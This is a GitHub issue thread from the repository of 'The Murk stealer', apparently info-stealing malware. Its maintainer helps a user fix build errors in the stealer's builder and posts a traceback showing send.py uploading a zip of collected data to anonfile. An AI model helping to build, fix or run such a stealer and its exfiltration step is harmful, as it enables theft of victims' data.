### ISSUE TITLE
Cannot create a file when that file already exists: send.py

### ISSUE THREAD

**Issue by Squatch55** [Nick-Vinesmoke/The-Murk-stealer#54]
![image](https://user-images.githubusercontent.com/79423107/236108091-0e4f049a-99cc-45d2-ade0-307df0e8026c.png)

**Comment by Nick-Vinesmoke** [comment]
When you get this error

**Comment by Nick-Vinesmoke** [comment]
?

**Comment by Squatch55** [comment]
> When you get this error

Today

**Comment by Nick-Vinesmoke** [comment]
> > When you get this error
> 
> Today

It was an error with builder or with stealer or idk?

**Comment by Squatch55** [comment]
With builder, when i press y it shows the error
![image](https://user-images.githubusercontent.com/79423107/236256224-1348a3f5-0964-4586-819b-2d2e60517812.png)

**Comment by Nick-Vinesmoke** [comment]
I'll fix it today in 1 hour

**Comment by Nick-Vinesmoke** [comment]
you can see all new features in the dev tree

**Comment by Nick-Vinesmoke** [comment]
https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v8.0.1 try this

**Comment by Squatch55** [comment]
Now it says this after building started
![image](https://user-images.githubusercontent.com/79423107/236356779-2c7479a4-5c48-48cb-9493-1bf01b1e800d.png)

**Comment by Squatch55** [comment]
Now it says this after the building is started
![image](https://user-images.githubusercontent.com/79423107/236356842-c4cc310d-59b6-4ea0-b194-f00d37aedfc9.png)

**Comment by Nick-Vinesmoke** [comment]
oh it's an error with nuitka you should have python version not newer than https://www.python.org/downloads/release/python-31010/, today I'll add building using pyinstaller too

**Comment by Squatch55** [comment]
Weird. I changed my version but still same.
![image](https://user-images.githubusercontent.com/79423107/236378565-45dab6b4-8d4c-4b04-b61a-d9a26577c905.png)

**Comment by Nick-Vinesmoke** [comment]
today I'll add building using pyinstaller too

**Comment by Squatch55** [comment]
Okay, im waiting. Thank you btw <3

**Comment by Nick-Vinesmoke** [comment]
Idk why but pyinstaller can't build correctly

**Comment by Nick-Vinesmoke** [comment]
pyinstaller so bad

**Comment by Squatch55** [comment]
lol, no worries

**Comment by Nick-Vinesmoke** [comment]
if I compile it using pyinstaller I get this 
``` Traceback (most recent call last):
  File "TheMurk.py", line 84, in <module>
  File "scripts\manager\send.py", line 22, in Send
    upload = file.upload(rf'{np[0]}.zip', progressbar=True)
  File "anonfile\anonfile.py", line 296, in upload
  File "tqdm\std.py", line 1107, in __init__
  File "tqdm\std.py", line 1344, in refresh
  File "tqdm\std.py", line 1492, in display
  File "tqdm\std.py", line 348, in print_status
  File "tqdm\std.py", line 341, in fp_write
  File "tqdm\utils.py", line 88, in __getattr__
AttributeError: 'NoneType' object has no attribute 'write'```

**Comment by Nick-Vinesmoke** [comment]
I can do it without anonfiles api using requests,  but in this case, zip won't delete after sending

**Comment by Nick-Vinesmoke** [comment]
So sorry bro

**Comment by Nick-Vinesmoke** [comment]
I can teach you how to build manually

**Comment by Nick-Vinesmoke** [comment]
In vs code and if I use nuitka all work correctly

**Comment by Squatch55** [comment]
I will try to build manually

**Comment by Nick-Vinesmoke** [comment]
I add tutorial to read me

**Comment by Nick-Vinesmoke** [comment]
⭐Please, star this repo if it was helpful⭐, I know that it wasn't so helpfu,l sorry, nuitka have bugs and pyinstaller so bad(

**Comment by Squatch55** [comment]
> 

Well, its the same issue but i will give star because its a good repo.

**Comment by Nick-Vinesmoke** [comment]
thx

**Comment by Nick-Vinesmoke** [comment]
https://github.com/Nick-Vinesmoke/The-Murk-stealer/releases/tag/The_Murk_v8.1.0 new release with all bugs fixed
